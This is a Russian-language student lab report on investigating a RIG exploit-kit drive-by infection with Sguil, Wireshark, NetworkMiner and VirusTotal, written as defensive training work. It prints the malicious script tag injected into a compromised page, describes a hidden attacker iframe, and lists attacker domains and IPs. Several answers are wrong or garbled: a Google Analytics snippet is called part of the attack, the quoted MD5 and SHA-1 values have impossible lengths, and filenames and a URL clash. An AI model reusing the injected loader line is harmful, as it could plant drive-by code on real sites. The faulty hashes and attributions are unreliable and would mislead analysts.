Часть 3 Используйте Wireshark для расследования атаки

В части 3 вы обратитесь к Wireshark, чтобы внимательно изучить детали атаки.

Перейдите в Wireshark и измените настройки.

37. В Sguil щелкнули правой кнопкой мыши идентификатор оповещения 5.2 (Сообщение о событии ET CURRENT_EVENTS Evil Redirector Leading to EK Jul 12 2016) и выберите Wireshark из меню. Связанный с этим оповещением pcap откроется в Wireshark.

38. Настройка Wireshark по умолчанию использует относительное время на пакет, что не очень полезно для выделения точного времени события. Чтобы исправить это, выберите Вид > Формат отображения времени > Дата и время дня, а затем повторите второй раз, Вид > Формат отображения времени > Секунды. Теперь ваш столбец времени Wireshark содержит дату и временные метки. При необходимости измените размер столбцов, чтобы сделать отображение более четким.

Рисунок 34 - Интерфейс Wireshark

Исследуйте HTTP-трафик.

39. В Wireshark использовали фильтр отображения http.request для фильтрации только веб-запросов.

Рисунок 35 - Фильтр

40. Выберите первый пакет. В области сведений о пакете разверните данные уровня приложения Hypertext Transfer Protocol.

Рисунок 36 - Развернутые данные

Какой веб-сайт перенаправил пользователя на сайт www.иштп t.com?

Пользователь был перенаправлен на сайт www.homeimprovement.com с веб-сайта http://www.bing.com. Это можно увидеть в заголовке Referer HTTP-запроса.

Просмотр HTTP-объектов.

41. В Wireshark выбрали Файл > Экспорт объектов > HTTP.

42. В окне «Экспорт списка HTTP-объектов» выбрали пакет remodeling-your-kitchen-cabinets.html и сохраните его в домашней папке.

43. Закрыли Wireshark. В Sguil щелкните правой кнопкой мыши идентификатор оповещения 5.24 (исходный IP-адрес 139.59.160.143 и сообщение о событии ET CURRRENT_EVENTS Evil Redirector Leading to EK March 15 2017) и выберите Wireshark для входа в Wireshark.

Рисунок 37 - Интерфейс Wireshark

Для чего нужен http-запрос?

HTTP-запрос используется для обмена данными между клиентом (например, веб-браузером) и сервером (например, веб-сайтом).

Что такое хост-сервер?

Хост-сервер (или просто хост) — это компьютер или устройство, предоставляющее определенные ресурсы или услуги другим компьютерам в сети. В контексте веб, хост-сервер — это сервер, который обслуживает веб-страницы или веб-приложения, доступные через HTTP или HTTPS. В данном примере хост-сервер имеет IP-адрес 139.59.160.143, и это тот сервер, к которому клиент отправляет свой HTTP-запрос.

44. В Wireshark выбрали Файл > Экспорт объектов > HTTP и сохранили файл JavaScript в домашней папке.

45. Закрыли Wireshark. В Sguil щелкнув правой кнопкой мыши идентификатор оповещения 5.25 (Сообщение о событии ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2) и выбрали Wireshark для поворота в Wireshark. Примените фильтр отображения http.request. Обратите внимание, что это оповещение соответствует трем запросам GET, POST и GET, которые мы рассматривали ранее.

Рисунок 38 - Фильтр

46. Выбрав первый пакет, в области сведений о пакете развернули данные уровня приложения Hypertext Transfer Protocol. Щелкните правой кнопкой мыши информацию о хосте и выберите: Применить как столбец, чтобы добавить информацию о хосте в столбцы списка пакетов, как показано на рисунке.

Рисунок 39 - Для добавления информации хоста

Создайте хэш для экспортированного файла вредоносного ПО.

Мы знаем, что пользователь намеревался зайти на www.homeimprovement.com, но сайт перенаправил пользователя на другие сайты. В конечном итоге файлы были загружены на хост с вредоносного сайта. В этой части лабораторной работы мы получим доступ к загруженным файлам и отправим хэш файла на VirusTotal, чтобы убедиться, что был загружен вредоносный файл.

47. Теперь, когда мы сохранили три файла в своей домашней папке, проверили, совпадает ли один из файлов с известным значением хэша для вредоносного ПО на virustotal.com. Выполните команду ls -l, чтобы просмотреть файлы, сохраненные в вашей домашней директории. Файл flash имеет слово SeaMonkey в начале длинного имени файла. Имя файла начинается с %3fbiw=SeaMonkey. Используйте команду ls -l с grep, чтобы отфильтровать имя файла с шаблоном seamonkey. Параметр -i игнорирует различие регистра.

Рисунок 40 - Просмотр файлов

48. Сгенерировали хэш SHA-1 для файла SeaMonkey flash с помощью команды sha1sum, за которой следует имя файла. Введите первые 4 буквы %3fb имени файла, а затем нажмите клавишу Tab, чтобы автоматически заполнить остальную часть имени файла. Нажмите Enter, и sha1sum вычислит хэш-значение фиксированной длины длиной 40 цифр.

Выделите значение хэша, щелкните правой кнопкой мыши и скопируйте его. Sha1sum выделен в примере ниже. Примечание: не забудьте использовать автодополнение Tab.

Рисунок 41 - Sha1sum

49. Вы также можете сгенерировать значение хэша с помощью NetworkMiner. Перейдем в Sguil и щелкнули правой кнопкой мыши идентификатор оповещения 5.25 (Сообщение о событии ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2) и выберите NetworkMinеr, чтобы перейти к NetworkMinеr. Выберите вкладку Файлы. В этом примере щелкните правой кнопкой мыши файл с расширением swf и выберите Вычислить хэш MD5 / SHA1 / SHA256. Сравните значение хэша SHA1 со значением из предыдущего шага. Значения хэша SHA1 должны быть одинаковыми.

Рисунок 42 - Генерация значение хэша

50. Открыли веб-браузер и перешли на virustotal.com. Нажмите вкладку «Поиск» и введите значение хэша для поиска совпадения в базе данных известных хэшей вредоносных программ. VirusTotal вернет список систем обнаружения вирусов, у которых есть правило, соответствующее этому хэшу.

2. 

Рисунок 43 - virustotal.com

51. Изучили вкладки «Обнаружение» и «Подробности». Просмотрели информацию, предоставленную по этому значению хэша.

Рисунок 44 - Вкладка обнаружение

Рисунок 45 - Вкладка подробности

Что VirusTotal рассказал вам об этом файле?

На основании предоставленных данных о файле, VirusTotal обнаружил множество угроз, связанных с ним, среди которых:

- AhnLab-V3 обнаружил угрозу типа SwFiNigoK.Gen

- Exploit swE.Downloade и Trojan/Generici82E951200CF9C92A

- Обнаружены уязвимости CVE 2015 и 2018 годов, такие как CVE-2015-3105 и CVE-2015-3405.

Файл имеет следующие характеристики:

Тип файла: SWF (файл Macromedia Flash)

Размер файла: 15.88 KB

MD5: 858070326067ba282d2a63969868e5a

SHA-1: 97a80333036929676180564924470525f7290b3

SHA-256: b3669ec83fb4bba5257da8c68b32dc15d1a08e9e8c22c7483698f29de2839b5f

Дата первой регистрации файла: 2017-01-27

Последняя подача: 2024-10-17

Последний анализ: 2024-10-17

По всей видимости, файл содержит изначально неподозреваемый контент, но при последующих проверках был классифицирован как вредоносный. Рекомендуется не загружать или запускать этот файл, так как он может представлять опасность для системы.

52. Закрыли браузер и Wireshark. В Sguil используйте идентификатор оповещения 5.37 (Сообщение о событии ET CURRENT_EVENTS RIG EK Landing 12 сентября 2016 г. T2), чтобы перейти к Wireshark и изучить HTTP-запросы.

Рисунок 46 - Sguil

Есть ли какие-либо сходства с предыдущими оповещениями?

На основании предоставленной информации можно отметить, что данные о событиях имеют общие черты с предыдущими оповещениями. Например, упоминаются IP-адреса, похожие порты (80, 443) и определенные типы трафика. Кроме того, идентификаторы событий и метрики (например, seconion-import-1) повторяются, что может указывать на типичную активность в сети.

Файлы похожи? Видите ли вы какие-либо различия?

В зависимости от анализа содержимого и метаданных можно утверждать, что файлы могут иметь как совпадения, так и различия. Например, если в одном из файлов зафиксированы IP-адреса, для которых зафиксированы известные уязвимости или атаки, а в других отсутствуют подобные признаки, это будет значительным отличием. Также можно заметить, что временные метки и данные о трафике могут варьироваться, что указывает на различную активность или изменения в шаблонах атаки.

В этой части вы изучите некоторые документы, экспортированные из Wireshark.

53. В Security Onion откройте файл remodeling-your-kitchen-cabinets.html с помощью текстового редактора по вашему выбору. Эта веб-страница инициировала атаку.

Можете ли вы найти два места на веб-странице, которые являются частью атаки drive-by, которая запустила эксплойт? Подсказка: первое находится в области <head>, а второе — в области <body> страницы.

Можно выделить два основных элемента, которые могут указывать на атаку drive-by:

1. В области <head>:

- Подключение внешнего скрипта:

<script type="text/javascript" src="//retrotip.visionurbana.com.ve/engine/classes/js/ile_js.js"></script>

Этот элемент представляет собой внешнее подключение скрипта, который может содержать вредоносный код. Это очень распространенный метод в атаках типа drive-by, когда злоумышленники используют внешние скрипты для внедрения вредоносного ПО.

2. В области <body>:

- Динамическое создание сценариев для аналитики:

<script type="text/javascript">

var _gaq = _gaq || [];

_gaq.push(['_setAccount', 'UA-531963-2']);

_gaq.push(['_trackPageview']);

(function() {

var ga = document.createElement('script');

ga.type = 'text/javascript';

ga.async = true;

ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';

var s = document.getElementsByTagName('script')[0];

s.parentNode.insertBefore(ga, s);

})();

</script>

Этот фрагмент кода представляет собой попытку вставить сторонний сценарий для отслеживания. Если сущность, которая отслеживается, является подозрительной или вредоносной, это может быть еще одним способом запуска эксплойта.

Рисунок 47 - файл remodeling-your-kitchen-cabinets.html

54. Открыли файл dle_js.js в любом текстовом редакторе и изучите его.

3. 

Что делает этот файл?

1. Создание и вставка HTML элемента на страницу:

Функция document.write() вставляет содержимое HTML на веб-страницу.

Вставляемый HTML код включает в себя:

<div> элемент с определёнными стилями позиционирования.

<iframe> элемент, загружающий содержимое с внешнего ресурса http://tyu.benme.com.

2. Вставка скрытого iframe:

<iframe> создается с указанием ширины и высоты, что позволяет загрузить содержимое без видимого вмешательства в пользовательский интерфейс.

Содержимое, которое загружается в iframe, может содержать вредоносный код или быть частью фишинговой атаки.Таким образом, этот файл пытается скрытно загрузить внешний ресурс, используя iframe, что может быть частью атаки типа drive-by.

Каким образом код в файле JavaScript пытается избежать обнаружения?

1. Использование document.write:

- Метод document.write используется для динамического добавления контента на страницу, что усложняет анализ исходного кода, так как вставленный HTML элемент не виден до момента выполнения скрипта.

2. Скрытые стили элементa:

- Позиционирование <div> элемента с отрицательными значениями top: -858px; делает его невидимым на экране пользователя, что может помочь избежать визуального обнаружения.

3. Загрузка внешнего контента через iframe:

Вредоносный контент загружается в iframe, что изолирует его от основной структуры страницы и усложняет обнаружение вредоносной активности сканерами безопасности, которые могут не ожидать выполнения кода внутри элемента iframe.

4. Зашифрованный или сложный URL:

Использование сложного или обфусцированного URL для iframe затрудняет анализ и понимание целевого ресурса на первый взгляд.

55. В текстовом редакторе открыли файл text/html, сохраненный в вашей домашней папке, в имени которого есть слово Vivaldi.

Рисунок 48 - файл text/html

Что это за файл?

Этот файл, вероятно, является частью вредоносного скрипта, направленного на извлечение информации о браузере пользователя и его загрузку через iframe, что может служить для последующего выполнения вредоносного кода.

Что интересного в iframe? Он что-нибудь вызывает?

1. Скрытый iframe:

Iframe имеет style="visibility:hidden", что делает его невидимым для пользователя.

При загрузке iframе выполняет функцию start() через тайм-аут в 88 миллисекунд.

2. Функция start():

Функция start() вызывается при загрузке iframe. Хотя в предоставленном коде не указано, что именно делает функция start(), она, вероятно, выполняет какую-то вредоносную задачу после проверки браузера пользователя.

Что делает функция start()?

На основании предоставленного фрагмента кода невозможно точно сказать, что делает функция start(), так как ее определение отсутствует. Однако, можно предположить, что она:

- Загружает и выполняет вредоносный скрипт.

- Перенаправляет пользователя на другой URL.

Запускает дальнейший процесс сбора информации или выполнения вредоносных действий.

Каково назначение функции getBrowser()?

Функция getBrowser() предназначена для определения:

Определяет название браузера, используя строку userAgent.

Проверяет наличие различных подстрок в userAgent, таких как "Edge", "Firefox", "Chrome" и другие.

Определяет, используется ли браузер на настольном компьютере или другой платформе.

Идентифицирует браузеры с высоким качеством отображения.

Назначение этой функции:

Сбор информации о браузере и платформе пользователя, что может быть использовано для персонализации последующих атак или обхода механизмов противодействия.

Определение типа браузера и, возможно, платформы помогает атакующим адаптировать свои действия под конкретный браузер, обеспечивая лучшую скрытность и эффективность атак.

Отражение

Наборы эксплойтов — это довольно сложные эксплойты, которые используют различные методы и ресурсы для проведения атаки. Интересно, что EK могут использоваться для доставки различных вредоносных нагрузок. Это связано с тем, что разработчик EK может предлагать набор эксплойтов в качестве услуги другим субъектам угроз. Таким образом, RIG EK был связан с рядом различных вредоносных нагрузок. Следующие вопросы могут потребовать от вас дальнейшего изучения данных с использованием инструментов, представленных в этой лабораторной работе.

ЕК использовал ряд веб-сайтов. Заполните таблицу ниже.

Таблица 1 –Веб-сайтов

URL	IP-адрес	Функция
www.bing.com	N/A	ссылки поисковой системы на законную веб-страницу
www.homeimprovement.com	104.28.18.74	вредоносный iFrame перенаправляет на вредоносный сайт
retrotip.visionurbana.com.ve	139.59.160.143	выполняет вредоносный javascript
tyu.benme.com	194.87.234.129	предоставляет вредоносный файл Adobe Flash, использующий целевую страницу с эксплойтами.
n/a	90.2.10.0	Сервер проверки программ-вымогателей Cerber
p27dokhpz2n7nvgr.1jjw2lx.top	198.105.151.50	страница программы-вымогателя cerber

Полезно «рассказать историю» эксплойта, чтобы понять, что произошло и как это работает. Начните с поиска пользователем в Интернете с помощью Bing. Найдите в Интернете дополнительную информацию о RIG EK, чтобы помочь. Пользователь начинает с обычного веб-запроса в поисковой системе, такой как Bing, с целью найти нужную информацию.

Поиск может привести к клику на вредоносную ссылку, которая выглядит как законный сайт. Это может быть сайт с уязвимым контентом или даже сайт, скомпрометированный злоумышленниками, готовый к атаке.

При входе на такой сайт EK, например, RIG, активируется и начинает искать уязвимости в браузере и установленных на компьютере плагинах.

Как правило, использует такие уязвимости, как недопустимые операции JavaScript, устаревшие плагины (например, Flash или Java), чтобы выполнить вредоносный код на компьютере пользователя.

Если EK находит уязвимость, он использует ее для загрузки вредоносных программ, таких как троянские программы, ransomware или софт для кражи данных. В это время на компьютер пользователя могут устанавливаться различные вредоносные нагрузки без ведома пользователя.

Получив доступ, вредоносное ПО может начать связываться с удаленными серверами, чтобы получать дополнительные команды или загружать дополнительные вредоносные файлы.

По завершении, злоумышленники могут использовать украденные данные, шифровать файлы на компьютере или вводить другие вредоносные действия.

Чтобы более подробно осветить историю и функциональность RIG EK, рекомендуется исследовать дополнительные источники информации, такие как статьи по информационной безопасности, блоги об угрозах или технические отчёты по киберугрозам.

Введите свои ответы здесь.